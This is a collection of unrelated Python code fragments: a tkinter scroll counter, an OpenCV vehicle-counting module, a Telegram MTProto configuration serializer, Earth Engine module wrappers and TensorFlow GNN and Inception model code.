if event.num == 4 or event.delta == 120:
number += 1
label['text'] = number
# --- main ---
number = 0
root = tk.Tk()
label = tk.Label(root, text="0")
label.pack(ipadx=15, ipady=5)
# Windows
root.bind("<MouseWheel>", mouse_wheel)
# Linux
root.bind("<Button-4>", mouse_wheel)
root.bind("<Button-5>", mouse_wheel)
root.mainloop()
|
11557363
|
from chromeless import Chromeless as _Chromeless, dumps
class Chromeless(_Chromeless):
def __invoke_local(self, dumped):
print("__invoke_local")
print(dumped)
with open('/tmp/dumped.txt', 'w') as f:
f.write(dumped)
return dumps(("hoge", {"status": "succeess"}))
def get_title(self, url):
self.get(url)
return self.title
if __name__ == '__main__':
chrome = Chromeless()
chrome.attach(get_title)
print(chrome.get_title("https://example.com"))
|
11557389
|
import cv2
# import speed_prediction
import tools.speed_prediction as speed_prediction
# from core.config import cfg
# from core.utils import read_class_names
# is_vehicle_detected = [0]
left_vehicle_counter = 0
right_vehicle_counter = 0
bottom_vehicle_counter = 0
LEFT_INTERSECTION_ROI_POSITION = 400
LEFT_INTERSECTION_ROI_START = 300
LEFT_INTERSECTION_ROI_END = 550
RIGHT_INTERSECTION_ROI_POSITION = 1000
RIGHT_INTERSECTION_ROI_START = 0
RIGHT_INTERSECTION_ROI_END = 250
BOTTOM_INTERSECTION_ROI_POSITION = 600
BOTTOM_INTERSECTION_ROI_START = 600
BOTTOM_INTERSECTION_ROI_END = 1000
def vehicle_counting(
box_top,
box_bottom,
box_right,
box_left,
current_frame_number,
# crop_img,
roi_position,
roi_start,
roi_end,
roi_dirtction
):
isInROI = False # is the object that is inside Region Of Interest
vehicle_front = 0
is_vehicle_detected = []
direction = ''
speed = 0
# direction change
if roi_dirtction == 'top_to_bottom':
vehicle_front = box_bottom
vehicle_back = box_top
vehicle_left = box_right
vehicle_right = box_left
elif roi_dirtction == 'bottom_to_top':
vehicle_front = box_top
vehicle_back = box_bottom
vehicle_left = box_left
vehicle_right = box_right
elif roi_dirtction == 'left_to_right':
vehicle_front = box_right
vehicle_back = box_left
vehicle_left = box_top
vehicle_right = box_bottom
elif roi_dirtction == 'right_to_left':
vehicle_front = box_left
vehicle_back = box_right
vehicle_left = box_bottom
vehicle_right = box_top
else:
vehicle_front = 0
vehicle_back = 0
vehicle_left = 0
vehicle_right = 0
# determine if the vehicle is on the line
if max(vehicle_front,vehicle_back) > roi_position and \
min(vehicle_front,vehicle_back) < roi_position and \
vehicle_left > roi_start and \
vehicle_left < roi_end and \
vehicle_right > roi_start and \
vehicle_right < roi_end:
# # debug
# print('vehicle on line')
direction, speed, is_vehicle_detected, update_csv = speed_prediction.predict_speed(
vehicle_front,
vehicle_back,
current_frame_number,
# crop_img,
roi_position)
if(1 in is_vehicle_detected):
counting = True
del is_vehicle_detected[:]
is_vehicle_detected = []
else:
counting = False
return (direction, speed, counting)
def vehicle_counting_multi(
image,
box_top,
box_bottom,
box_right,
box_left,
current_frame_number):
global left_vehicle_counter
global right_vehicle_counter
global bottom_vehicle_counter
# left intersection
left_direction, left_speed, left_counting = vehicle_counting(
box_top,
box_bottom,
box_right,
box_left,
current_frame_number,
LEFT_INTERSECTION_ROI_POSITION,
LEFT_INTERSECTION_ROI_START,
LEFT_INTERSECTION_ROI_END,
'left_to_right')
# when the vehicle passed over line and counted, make the color of ROI line green
if left_counting:
left_vehicle_counter += 1
cv2.line(image, \
(LEFT_INTERSECTION_ROI_POSITION, LEFT_INTERSECTION_ROI_START), \
(LEFT_INTERSECTION_ROI_POSITION, LEFT_INTERSECTION_ROI_END), \
(0, 0xFF, 0), 5)
else:
cv2.line(image, \
(LEFT_INTERSECTION_ROI_POSITION, LEFT_INTERSECTION_ROI_START), \
(LEFT_INTERSECTION_ROI_POSITION, LEFT_INTERSECTION_ROI_END), \
(0, 0, 0xFF), 5)
# right intersection
right_direction, right_speed, right_counting = vehicle_counting(
box_top,
box_bottom,
box_right,
box_left,
current_frame_number,
RIGHT_INTERSECTION_ROI_POSITION,
RIGHT_INTERSECTION_ROI_START,
RIGHT_INTERSECTION_ROI_END,
'right_to_left')
if right_counting:
right_vehicle_counter += 1
cv2.line(image, \
(RIGHT_INTERSECTION_ROI_POSITION, RIGHT_INTERSECTION_ROI_START), \
(RIGHT_INTERSECTION_ROI_POSITION, RIGHT_INTERSECTION_ROI_END), \
(0, 0xFF, 0), 5)
else:
cv2.line(image, \
(RIGHT_INTERSECTION_ROI_POSITION, RIGHT_INTERSECTION_ROI_START), \
(RIGHT_INTERSECTION_ROI_POSITION, RIGHT_INTERSECTION_ROI_END), \
(0, 0, 0xFF), 5)
# bottom intersection
bottom_direction, bottom_speed, bottom_counting = vehicle_counting(
box_top,
box_bottom,
box_right,
box_left,
current_frame_number,
BOTTOM_INTERSECTION_ROI_POSITION,
BOTTOM_INTERSECTION_ROI_START,
BOTTOM_INTERSECTION_ROI_END,
'bottom_to_top')
if bottom_counting:
bottom_vehicle_counter += 1
cv2.line(image, \
(BOTTOM_INTERSECTION_ROI_START, BOTTOM_INTERSECTION_ROI_POSITION), \
(BOTTOM_INTERSECTION_ROI_END, BOTTOM_INTERSECTION_ROI_POSITION), \
(0, 0xFF, 0), 5)
else:
cv2.line(image, \
(BOTTOM_INTERSECTION_ROI_START, BOTTOM_INTERSECTION_ROI_POSITION), \
(BOTTOM_INTERSECTION_ROI_END, BOTTOM_INTERSECTION_ROI_POSITION), \
(0, 0, 0xFF), 5)
return (image, left_vehicle_counter, right_vehicle_counter, bottom_vehicle_counter)
# def draw_bbox(image, bboxes, current_frame_number, classes=read_class_names(cfg.YOLO.CLASSES), show_label=True):
# """
# bboxes: [x_min, y_min, x_max, y_max, probability, cls_id] format coordinates.
# """
# num_classes = len(classes)
# image_h, image_w, _ = image.shape
# hsv_tuples = [(1.0 * x / num_classes, 1., 1.) for x in range(num_classes)]
# colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
# colors = list(map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)), colors))
# random.seed(0)
# random.shuffle(colors)
# random.seed(None)
# for i, bbox in enumerate(bboxes):
# coor = np.array(bbox[:4], dtype=np.int32)
# fontScale = 0.5
# score = bbox[4]
# class_ind = int(bbox[5])
# bbox_color = colors[class_ind]
# bbox_thick = int(0.6 * (image_h + image_w) / 600)
# c1, c2 = (coor[0], coor[1]), (coor[2], coor[3])
# cv2.rectangle(image, c1, c2, bbox_color, bbox_thick)
# image, left_vehicle_counter, right_vehicle_counter, bottom_vehicle_counter = vehicle_counting_multi(image, \
# coor[1], \
# coor[3], \
# coor[2], \
# coor[0], \
# current_frame_number)
# if show_label:
# bbox_mess = '%s: %.2f' % (classes[class_ind], score)
# t_size = cv2.getTextSize(bbox_mess, 0, fontScale, thickness=bbox_thick//2)[0]
# cv2.rectangle(image, c1, (c1[0] + t_size[0], c1[1] - t_size[1] - 3), bbox_color, -1) # filled
# cv2.putText(image, bbox_mess, (c1[0], c1[1]-2), cv2.FONT_HERSHEY_SIMPLEX,
# fontScale, (0, 0, 0), bbox_thick//2, lineType=cv2.LINE_AA)
# left_info = 'Left Vehicle Number: ' + left_vehicle_counter
# right_info = 'Right Vehicle Number: ' + right_vehicle_counter
# bottom_info = 'Bottom Vehicle Number: ' + bottom_vehicle_counter
# cv2.putText(image, text=left_info, org=(50, 90), fontFace=cv2.FONT_HERSHEY_SIMPLEX,
# fontScale=1, color=(255, 0, 0), thickness=2)
# cv2.putText(image, text=right_info, org=(50, 90), fontFace=cv2.FONT_HERSHEY_SIMPLEX,
# fontScale=1, color=(255, 0, 0), thickness=2)
# cv2.putText(image, text=bottom_info, org=(50, 90), fontFace=cv2.FONT_HERSHEY_SIMPLEX,
# fontScale=1, color=(255, 0, 0), thickness=2)
# return image
|
11557407
|
import tensorflow as tf
in_b_ = tf.compat.v1.placeholder(dtype=tf.bool, shape=[2], name="Hole")
in_x_ = tf.compat.v1.placeholder(dtype=tf.float32, shape=[2, 3], name="Hole")
in_y_ = tf.compat.v1.placeholder(dtype=tf.float32, shape=[2, 3], name="Hole")
where_ = tf.compat.v1.where(in_b_, in_x_, in_y_)
|
11557423
|
from __future__ import annotations
from .configs import *
from . import shared as td
class MTP(BaseObject): # nocov
"""
[MTProto Protocal](https://core.telegram.org/mtproto)
This class is for further future developments and has no usage for now.
### Attributes:
`Environment` (`class`): MTP Enviroment
`RSAPublicKey` (`class`): RSAPublicKey
`DcOptions` (`class`): DcOptions
`ConfigFields` (`class`): ConfigFields
`Config` (`class`): Config
"""
class Environment(IntEnum):
"""
Enviroment flag for MTP.Config
### Attributes:
Production (`IntEnum`): Production Enviroment
Test (`IntEnum`): Test Enviroment
"""
Production = 0
Test = 1
class RSAPublicKey(BaseObject):
"""
To be added
"""
class DcOptions(BaseObject):
"""
Data Center Options, providing information about DC ip, port,.. etc
"""
kVersion = 2
def __init__(self, enviroment: MTP.Environment) -> None:
self._enviroment = enviroment
self._publicKeys: typing.Dict[DcId, MTP.RSAPublicKey] = {}
self._cdnPublicKeys: typing.Dict[DcId, MTP.RSAPublicKey] = {}
self._data: typing.Dict[DcId, typing.List[MTP.DcOptions.Endpoint]] = {}
self.constructFromBuiltIn()
def isTestMode(self):
return self._enviroment != MTP.Environment.Production
def constructAddOne(
self, id: DcId, flags: MTP.DcOptions.Flag, ip: str, port: int, secret: bytes
):
self.applyOneGuarded(DcId.BareDcId(id), flags, ip, port, secret)
def applyOneGuarded(
self, id: DcId, flags: MTP.DcOptions.Flag, ip: str, port: int, secret: bytes
):
if not id in self._data:
self._data[id] = []
else:
for endpoint in self._data[id]:
if (endpoint.ip == ip) and (endpoint.port == port):
# skip this endpoint because it's already exists in the self._data
continue
endpoint = MTP.DcOptions.Endpoint(id, flags, ip, port, bytes())
self._data[id].append(endpoint)
def constructFromBuiltIn(self) -> None:
# TO BE ADDED
# self.readBuiltInPublicKeys()
def addToData(dcs: List[BuiltInDc], flags: MTP.DcOptions.Flag):
for dc in dcs:
self.applyOneGuarded(dc.id, flags, dc.ip, dc.port, bytes())
if self.isTestMode():
addToData(BuiltInDc.kBuiltInDcsTest, MTP.DcOptions.Flag.f_static | 0) # type: ignore
addToData(BuiltInDc.kBuiltInDcsIPv6Test, MTP.DcOptions.Flag.f_static | MTP.DcOptions.Flag.f_ipv6) # type: ignore
else:
addToData(BuiltInDc.kBuiltInDcs, MTP.DcOptions.Flag.f_static | 0) # type: ignore
addToData(BuiltInDc.kBuiltInDcsIPv6, MTP.DcOptions.Flag.f_static | MTP.DcOptions.Flag.f_ipv6) # type: ignore
def constructFromSerialized(self, serialized: QByteArray):
stream = QDataStream(serialized)
stream.setVersion(QDataStream.Version.Qt_5_1)
minusVersion = stream.readInt32()
version = (-minusVersion) if (minusVersion < 0) else 0
count = stream.readInt32() if version > 0 else minusVersion
self._data.clear()
for i in range(0, count):
dcId = DcId(stream.readInt32())
flags = MTP.DcOptions.Flag(stream.readInt32())
port = stream.readInt32()
ipSize = stream.readInt32()
kMaxIpSize = 45
Expects(
condition=((ipSize > 0) and (ipSize <= kMaxIpSize)),
exception=TDataBadConfigData("Bad ipSize data"),
)
ip = stream.readRawData(ipSize).decode("ascii")
kMaxSecretSize = 32
secret = bytes()
if version > 0:
secretSize = stream.readInt32()
Expects(
condition=(
(secretSize >= 0) and (secretSize <= kMaxSecretSize)
),
exception=TDataBadConfigData("Bad secretSize data"),
)
if secretSize > 0:
secret = stream.readRawData(secretSize)
ExpectStreamStatus(stream, "Could not stream config data")
self.applyOneGuarded(dcId, flags, ip, port, secret)
# TO BE ADDED
# Read CDN config
def Serialize(self) -> QByteArray:
optionsCount = 0
for dcId, endpoints in self._data.items():
if DcId.BareDcId(dcId) > 1000:
continue
optionsCount += len(endpoints)
result = QByteArray()
stream = QDataStream(result, QIODevice.OpenModeFlag.WriteOnly)
stream.setVersion(QDataStream.Version.Qt_5_1)
stream.writeInt32(-MTP.DcOptions.kVersion) # -2
# Dc options.
stream.writeInt32(optionsCount)
for dcId, endpoints in self._data.items():
if DcId.BareDcId(dcId) > 1000:
continue
# write endpoints
for endpoint in endpoints:
stream.writeInt32(endpoint.id)
stream.writeInt32(endpoint.flags)
stream.writeInt32(len(endpoint.ip))
stream.writeRawData(endpoint.ip.encode("ascii"))
stream.writeInt32(len(endpoint.secret))
stream.writeRawData(endpoint.secret)
# CDN public keys.
# TO BE ADDED
publicKeys = []
stream.writeInt32(len(publicKeys))
# for (auto &key : publicKeys) {
# stream << qint32(key.dcId)
# << Serialize::bytes(key.n)
# << Serialize::bytes(key.e);
# }
return result
class Address(int):
"""
Connection flag used for MTP.DcOptions.Endpoint
### Attributes:
IPv4 (`int`): IPv4 connection
IPv6 (`int`): IPv6 connection
"""
IPv4 = 0
IPv6 = 1
class Protocol(int):
"""
Protocal flag used for MTP.DcOptions.Endpoint
### Attributes:
Tcp (`int`): Tcp connection
Http (`int`): Http connection
"""
Tcp = 0
Http = 1
class Flag(int):
"""
Flag used for MTP.DcOptions.Endpoint
### Attributes:
f_ipv6 (`int`): f_ipv6
f_media_only (`int`): f_media_only
f_tcpo_only (`int`): f_tcpo_only
f_cdn (`int`): f_cdn
f_static (`int`): f_static
f_secret (`int`): f_secret
MAX_FIELD (`int`): MAX_FIELD
"""
f_ipv6 = 1 << 0
f_media_only = 1 << 1
f_tcpo_only = 1 << 2
f_cdn = 1 << 3
f_static = 1 << 4
f_secret = 1 << 10
MAX_FIELD = 1 << 10
class Endpoint(BaseObject):
"""
Data center endpoint
### Attributes:
id (`DcId`): Data Center ID
flags (`Flag`): `Flag`
ip (`str`): IP address of the data center
port (`int`): Port to connect to
secret (`bytes`): secret
"""
def __init__(
self,
id: int,
flags: MTP.DcOptions.Flag,
ip: str,
port: int,
secret: bytes,
) -> None:
self.id = id
self.flags = flags
self.ip = ip
self.port = port
self.secret = secret
class ConfigFields(BaseObject):
"""
Configuration data for `MTP.Config`
### Attributes:
chatSizeMax (`int`): `200`
megagroupSizeMax (`int`): `10000`
forwardedCountMax (`int`): `100`
onlineUpdatePeriod (`int`): `120000`
offlineBlurTimeout (`int`): `5000`
offlineIdleTimeout (`int`): `30000`
onlineFocusTimeout (`int`): `1000` `# Not from the server config.`
onlineCloudTimeout (`int`): `300000`
notifyCloudDelay (`int`): `30000`
notifyDefaultDelay (`int`): `1500`
savedGifsLimit (`int`): `200`
editTimeLimit (`int`): `172800`
revokeTimeLimit (`int`): `172800`
revokePrivateTimeLimit (`int`): `172800`
revokePrivateInbox (`bool`): `False`
stickersRecentLimit (`int`): `30`
stickersFavedLimit (`int`): `5`
pinnedDialogsCountMax (`int`): `5`
pinnedDialogsInFolderMax (`int`): `100`
internalLinksDomain (`str`): `"https://t.me/"`
channelsReadMediaPeriod (`int`): `86400 * 7`
callReceiveTimeoutMs (`int`): `20000`
callRingTimeoutMs (`int`): `90000`
callConnectTimeoutMs (`int`): `30000`
callPacketTimeoutMs (`int`): `10000`
webFileDcId (`int`): `4`
txtDomainString (`str`): `str()`
phoneCallsEnabled (`bool`): `True`
blockedMode (`bool`): `False`
captionLengthMax (`int`): `1024`
"""
def __init__(self) -> None:
self.chatSizeMax = 200
self.megagroupSizeMax = 10000
self.forwardedCountMax = 100
self.onlineUpdatePeriod = 120000
self.offlineBlurTimeout = 5000
self.offlineIdleTimeout = 30000
self.onlineFocusTimeout = 1000 # Not from the server config.
self.onlineCloudTimeout = 300000
self.notifyCloudDelay = 30000
self.notifyDefaultDelay = 1500
self.savedGifsLimit = 200
self.editTimeLimit = 172800
self.revokeTimeLimit = 172800
self.revokePrivateTimeLimit = 172800
self.revokePrivateInbox = False
self.stickersRecentLimit = 30
self.stickersFavedLimit = 5
self.pinnedDialogsCountMax = 5
self.pinnedDialogsInFolderMax = 100
self.internalLinksDomain = "https://t.me/"
self.channelsReadMediaPeriod = 86400 * 7
self.callReceiveTimeoutMs = 20000
self.callRingTimeoutMs = 90000
self.callConnectTimeoutMs = 30000
self.callPacketTimeoutMs = 10000
self.webFileDcId = 4
self.txtDomainString = str()
self.phoneCallsEnabled = True
self.blockedMode = False
self.captionLengthMax = 1024
class Config(BaseObject):
"""
Configuration of MTProto
### Attributes:
kVersion (`int`): `1`
"""
kVersion = 1
def __init__(self, enviroment: MTP.Environment) -> None:
self._dcOptions = MTP.DcOptions(enviroment)
self._fields = MTP.ConfigFields()
self._fields.webFileDcId = 2 if self._dcOptions.isTestMode() else 4
self._fields.txtDomainString = (
"tapv3.stel.com" if self._dcOptions.isTestMode() else "apv3.stel.com"
)
def endpoints(
self, dcId: DcId = DcId._0
) -> Dict[
MTP.DcOptions.Address,
Dict[MTP.DcOptions.Protocol, List[MTP.DcOptions.Endpoint]],
]:
endpoints = self._dcOptions._data[dcId]
Address = MTP.DcOptions.Address
Protocol = MTP.DcOptions.Protocol
Flag = MTP.DcOptions.Flag
Endpoint = MTP.DcOptions.Endpoint
results: Dict[Address, Dict[Protocol, List[Endpoint]]] = {}
results[Address.IPv4] = {Protocol.Tcp: [], Protocol.Http: []} # type: ignore
results[Address.IPv6] = {Protocol.Tcp: [], Protocol.Http: []} # type: ignore
for endpoint in endpoints:
if dcId == 0 or endpoint.id == dcId:
flags = endpoint.flags
address = Address.IPv6 if (flags & Flag.f_ipv6) else Address.IPv4
results[address][Protocol.Tcp].append(endpoint) # type: ignore
if not (flags & (Flag.f_tcpo_only | Flag.f_secret)):
results[address][Protocol.Http].append(endpoint) # type: ignore
return results
def Serialize(self) -> QByteArray:
options = self._dcOptions.Serialize()
size = sizeof(int32) * 2
size += td.Serialize.bytearraySize(options)
size += 28 * sizeof(int32)
size += td.Serialize.stringSize(self._fields.internalLinksDomain)
size += td.Serialize.stringSize(self._fields.txtDomainString)
result = QByteArray()
stream = QDataStream(result, QIODevice.OpenModeFlag.WriteOnly)
stream.setVersion(QDataStream.Version.Qt_5_1)
stream.writeInt32(MTP.Config.kVersion)
stream.writeInt32(
MTP.Environment.Test
if self._dcOptions.isTestMode()
else MTP.Environment.Production
)
stream << options
stream.writeInt32(self._fields.chatSizeMax)
stream.writeInt32(self._fields.megagroupSizeMax)
stream.writeInt32(self._fields.forwardedCountMax)
stream.writeInt32(self._fields.onlineUpdatePeriod)
stream.writeInt32(self._fields.offlineBlurTimeout)
stream.writeInt32(self._fields.offlineIdleTimeout)
stream.writeInt32(self._fields.onlineFocusTimeout)
stream.writeInt32(self._fields.onlineCloudTimeout)
stream.writeInt32(self._fields.notifyCloudDelay)
stream.writeInt32(self._fields.notifyDefaultDelay)
stream.writeInt32(self._fields.savedGifsLimit)
stream.writeInt32(self._fields.editTimeLimit)
stream.writeInt32(self._fields.revokeTimeLimit)
stream.writeInt32(self._fields.revokePrivateTimeLimit)
stream.writeInt32(1 if self._fields.revokePrivateInbox else 0)
stream.writeInt32(self._fields.stickersRecentLimit)
stream.writeInt32(self._fields.stickersFavedLimit)
stream.writeInt32(self._fields.pinnedDialogsCountMax)
stream.writeInt32(self._fields.pinnedDialogsInFolderMax)
stream.writeQString(self._fields.internalLinksDomain)
# stream << self._fields.internalLinksDomain
stream.writeInt32(self._fields.channelsReadMediaPeriod)
stream.writeInt32(self._fields.callReceiveTimeoutMs)
stream.writeInt32(self._fields.callRingTimeoutMs)
stream.writeInt32(self._fields.callConnectTimeoutMs)
stream.writeInt32(self._fields.callPacketTimeoutMs)
stream.writeInt32(self._fields.webFileDcId)
stream.writeQString(self._fields.txtDomainString)
# stream << self._fields.txtDomainString
stream.writeInt32(1 if self._fields.phoneCallsEnabled else 0)
stream.writeInt32(1 if self._fields.blockedMode else 0)
stream.writeInt32(self._fields.captionLengthMax)
return result
@staticmethod
def FromSerialized(serialized: QByteArray) -> MTP.Config:
stream = QDataStream(serialized)
stream.setVersion(QDataStream.Version.Qt_5_1)
version = stream.readInt32()
Expects(
version == MTP.Config.kVersion,
"version != kVersion, something went wrong",
)
enviroment = MTP.Environment(stream.readInt32())
result = MTP.Config(enviroment)
def read(field: _T) -> _T:
vtype = type(field)
if vtype == int:
return stream.readInt32() # type: ignore
elif vtype == bool:
return stream.readInt32() == 1 # type: ignore
elif vtype == str:
return stream.readQString() # type: ignore
raise ValueError()
dcOptionsSerialized = QByteArray()
stream >> dcOptionsSerialized
fileds = result._fields
fileds.chatSizeMax = read(fileds.chatSizeMax)
fileds.megagroupSizeMax = read(fileds.megagroupSizeMax)
fileds.forwardedCountMax = read(fileds.forwardedCountMax)
fileds.onlineUpdatePeriod = read(fileds.onlineUpdatePeriod)
fileds.offlineBlurTimeout = read(fileds.offlineBlurTimeout)
fileds.offlineIdleTimeout = read(fileds.offlineIdleTimeout)
fileds.onlineFocusTimeout = read(fileds.onlineFocusTimeout)
fileds.onlineCloudTimeout = read(fileds.onlineCloudTimeout)
fileds.notifyCloudDelay = read(fileds.notifyCloudDelay)
fileds.notifyDefaultDelay = read(fileds.notifyDefaultDelay)
fileds.savedGifsLimit = read(fileds.savedGifsLimit)
fileds.editTimeLimit = read(fileds.editTimeLimit)
fileds.revokeTimeLimit = read(fileds.revokeTimeLimit)
fileds.revokePrivateTimeLimit = read(fileds.revokePrivateTimeLimit)
fileds.revokePrivateInbox = read(fileds.revokePrivateInbox)
fileds.stickersRecentLimit = read(fileds.stickersRecentLimit)
fileds.stickersFavedLimit = read(fileds.stickersFavedLimit)
fileds.pinnedDialogsCountMax = read(fileds.pinnedDialogsCountMax)
fileds.pinnedDialogsInFolderMax = read(fileds.pinnedDialogsInFolderMax)
fileds.internalLinksDomain = read(fileds.internalLinksDomain)
fileds.channelsReadMediaPeriod = read(fileds.channelsReadMediaPeriod)
fileds.callReceiveTimeoutMs = read(fileds.callReceiveTimeoutMs)
fileds.callRingTimeoutMs = read(fileds.callRingTimeoutMs)
fileds.callConnectTimeoutMs = read(fileds.callConnectTimeoutMs)
fileds.callPacketTimeoutMs = read(fileds.callPacketTimeoutMs)
fileds.webFileDcId = read(fileds.webFileDcId)
fileds.txtDomainString = read(fileds.txtDomainString)
fileds.phoneCallsEnabled = read(fileds.phoneCallsEnabled)
fileds.blockedMode = read(fileds.blockedMode)
fileds.captionLengthMax = read(fileds.captionLengthMax)
# print(fileds.chatSizeMax)
# print(fileds.megagroupSizeMax)
# print(fileds.forwardedCountMax)
# print(fileds.onlineUpdatePeriod)
# print(fileds.offlineBlurTimeout)
# print(fileds.offlineIdleTimeout)
# print(fileds.onlineFocusTimeout)
# print(fileds.onlineCloudTimeout)
# print(fileds.notifyCloudDelay)
# print(fileds.notifyDefaultDelay)
# print(fileds.savedGifsLimit)
# print(fileds.editTimeLimit)
# print(fileds.revokeTimeLimit)
# print(fileds.revokePrivateTimeLimit)
# print(fileds.revokePrivateInbox)
# print(fileds.stickersRecentLimit)
# print(fileds.stickersFavedLimit)
# print(fileds.pinnedDialogsCountMax)
# print(fileds.pinnedDialogsInFolderMax)
# print(fileds.internalLinksDomain)
# print(fileds.channelsReadMediaPeriod)
# print(fileds.callReceiveTimeoutMs)
# print(fileds.callRingTimeoutMs)
# print(fileds.callConnectTimeoutMs)
# print(fileds.callPacketTimeoutMs)
# print(fileds.webFileDcId)
# print(fileds.txtDomainString)
# print(fileds.phoneCallsEnabled)
# print(fileds.blockedMode)
# print(fileds.captionLengthMax)
ExpectStreamStatus(stream, "Could not stream MtpData serialized")
result._dcOptions.constructFromSerialized(dcOptionsSerialized)
return result
|
11557439
|
import ee
from ee_extra.JavaScript.install import install as ee_install
from ee_extra.JavaScript.install import uninstall as ee_uninstall
from ee_extra.JavaScript.main import ee_require
from .extending import extend
@extend(ee)
def require(module):
"""Loads and executes a JavaScript GEE module.
All modules must be first installed before requiring them. After requiring the module,
it can be used in the same way as it is used in the Code Editor.
Warning
-------
This method is highly :code:`experimental`. Please report any irregularities in the
Issues Page of `eeExtra <https://github.com/r-earthengine/ee_extra>`_.
Parameters
----------
module : str
Path to the module in the Code Editor (e.g. "users/dmlmont/spectral:spectral").
Returns
-------
BoxDict
Loaded module. Methods and attributes can be accessed using dot notation.
See Also
--------
install : Installs a JavaScript GEE module.
uninstall : Uninstalls a JavaScript GEE module.
Examples
--------
>>> import ee, eemont
>>> ee.Authenticate()
>>> ee.Initialize()
>>> LandsatLST = ee.require("users/sofiaermida/landsat_smw_lst:modules/Landsat_LST.js")
"""
return ee_require(module)
@extend(ee)
def install(module, update=False, quiet=False):
"""Installs a JavaScript GEE module.
Warning
-------
This method is highly :code:`experimental`. Please report any irregularities in the
Issues Page of `eeExtra <https://github.com/r-earthengine/ee_extra>`_.
Parameters
----------
module : str
Path to the module in the Code Editor (e.g. "users/dmlmont/spectral:spectral").
update : bool, default = False
Whether to update the module if it is already installed.
quiet : bool, default = False
Whether to show in console the process.
Returns
-------
None
See Also
--------
uninstall : Uninstalls a JavaScript GEE module.
require : Loads and executes a JavaScript GEE module.
Examples
--------
>>> import ee, eemont
>>> ee.Authenticate()
>>> ee.Initialize()
>>> ee.install("users/sofiaermida/landsat_smw_lst:modules/Landsat_LST.js")
"""
return ee_install(module, update, quiet)
@extend(ee)
def uninstall(module, quiet=False):
"""Uninstalls a JavaScript GEE module.
Warning
-------
This method is highly :code:`experimental`. Please report any irregularities in the
Issues Page of `eeExtra <https://github.com/r-earthengine/ee_extra>`_.
Parameters
----------
module : str
Path to the module in the Code Editor (e.g. "users/dmlmont/spectral:spectral").
quiet : bool, default = False
Whether to show in console the process.
Returns
-------
None
See Also
--------
install : Installs a JavaScript GEE module.
require : Loads and executes a JavaScript GEE module.
Examples
--------
>>> import ee, eemont
>>> ee.Authenticate()
>>> ee.Initialize()
>>> ee.uninstall("users/sofiaermida/landsat_smw_lst:modules/Landsat_LST.js")
"""
return ee_uninstall(module, quiet)
|
11557486
|
from typing import Dict, Any, List
import tensorflow as tf
from utils import MLP
from .sparse_graph_model import Sparse_Graph_Model
from tasks import Sparse_Graph_Task
from gnns import sparse_gnn_edge_mlp_layer
class No_Struct_MLP_Model(Sparse_Graph_Model):
@classmethod
def default_params(cls):
params = super().default_params()
params.update({
'max_nodes_in_batch': 25000,
'hidden_size': 128,
"graph_activation_function": "gelu",
"message_aggregation_function": "sum",
'graph_inter_layer_norm': True,
'use_target_state_as_input': True,
'num_edge_hidden_layers': 0,
})
return params
@staticmethod
def name(params: Dict[str, Any]) -> str:
return "NoStruct-MLP%i" % (params['num_edge_hidden_layers'])
def __init__(self, params: Dict[str, Any], task: Sparse_Graph_Task, run_id: str, result_dir: str) -> None:
super().__init__(params, task, run_id, result_dir)
def _apply_gnn_layer(self,
node_representations: tf.Tensor,
adjacency_lists: List[tf.Tensor],
type_to_num_incoming_edges: tf.Tensor,
num_timesteps: int
) -> tf.Tensor:
graph_to_nodes = self._Sparse_Graph_Model__placeholders['graph_to_nodes']
graph_nodes_list = self._Sparse_Graph_Model__placeholders['graph_nodes_list'] # (None, )
max_nodes = tf.shape(graph_to_nodes)[1]
tiled_nodes = tf.tile(tf.expand_dims(graph_to_nodes, axis=-1), (1, 1, max_nodes))
pairs = tf.concat(
[tf.expand_dims(tiled_nodes, axis=-1), tf.expand_dims(tf.transpose(tiled_nodes, [0, 2, 1]), axis=-1)],
axis=-1)
flat_pairs = tf.reshape(pairs, [-1, 2])
relevant_edges = tf.reshape(tf.gather(flat_pairs, tf.where(tf.reduce_min(flat_pairs, axis=-1) >= 0)), [-1, 2])
num_types = tf.shape(type_to_num_incoming_edges)[0]
num_nodes_in_graph = tf.reduce_sum(tf.cast(tf.greater(graph_to_nodes, -1), dtype=tf.float32), axis=-1)
num_incoming_nodes_per_node = tf.gather(params=num_nodes_in_graph, indices=graph_nodes_list)
type_to_num_incoming_edges = tf.tile(tf.expand_dims(num_incoming_nodes_per_node, axis=0), [num_types, 1])
return sparse_gnn_edge_mlp_layer(
node_embeddings=node_representations,
adjacency_lists=[relevant_edges for _ in adjacency_lists],
type_to_num_incoming_edges=type_to_num_incoming_edges,
state_dim=self.params['hidden_size'],
num_timesteps=num_timesteps,
activation_function=self.params['graph_activation_function'],
message_aggregation_function=self.params['message_aggregation_function'],
use_target_state_as_input=self.params['use_target_state_as_input'],
num_edge_hidden_layers=self.params['num_edge_hidden_layers'],
)
|
11557502
|
import tensorflow as tf
class Inception(tf.keras.layers.Layer):
def __init__(self, c1, c2, c3, c4):
super().__init__()
# 线路1,单1 x 1卷积层
self.p1_1 = tf.keras.layers.Conv2D(c1, kernel_size=1, activation='relu', padding='same')
# 线路2,1 x 1卷积层后接3 x 3卷积层
self.p2_1 = tf.keras.layers.Conv2D(c2[0], kernel_size=1, padding='same', activation='relu')
self.p2_2 = tf.keras.layers.Conv2D(c2[1], kernel_size=3, padding='same',
activation='relu')
# 线路3,1 x 1卷积层后接5 x 5卷积层
self.p3_1 = tf.keras.layers.Conv2D(c3[0], kernel_size=1, padding='same', activation='relu')
self.p3_2 = tf.keras.layers.Conv2D(c3[1], kernel_size=5, padding='same',
activation='relu')
# 线路4,3 x 3最大池化层后接1 x 1卷积层
self.p4_1 = tf.keras.layers.MaxPool2D(pool_size=3, padding='same', strides=1)
self.p4_2 = tf.keras.layers.Conv2D(c4, kernel_size=1, padding='same', activation='relu')
def call(self, x):
p1 = self.p1_1(x)
p2 = self.p2_2(self.p2_1(x))
p3 = self.p3_2(self.p3_1(x))
p4 = self.p4_2(self.p4_1(x))
return tf.concat([p1, p2, p3, p4], axis=-1) # 在通道维上连结输出
def build_googlenet():
b1 = tf.keras.models.Sequential()
b1.add(tf.keras.layers.Conv2D(64, kernel_size=7, strides=2, padding='same', activation='relu'))
b1.add(tf.keras.layers.MaxPool2D(pool_size=3, strides=2, padding='same'))
b2 = tf.keras.models.Sequential()
b2.add(tf.keras.layers.Conv2D(64, kernel_size=1, padding='same', activation='relu'))
b2.add(tf.keras.layers.Conv2D(192, kernel_size=3, padding='same', activation='relu'))
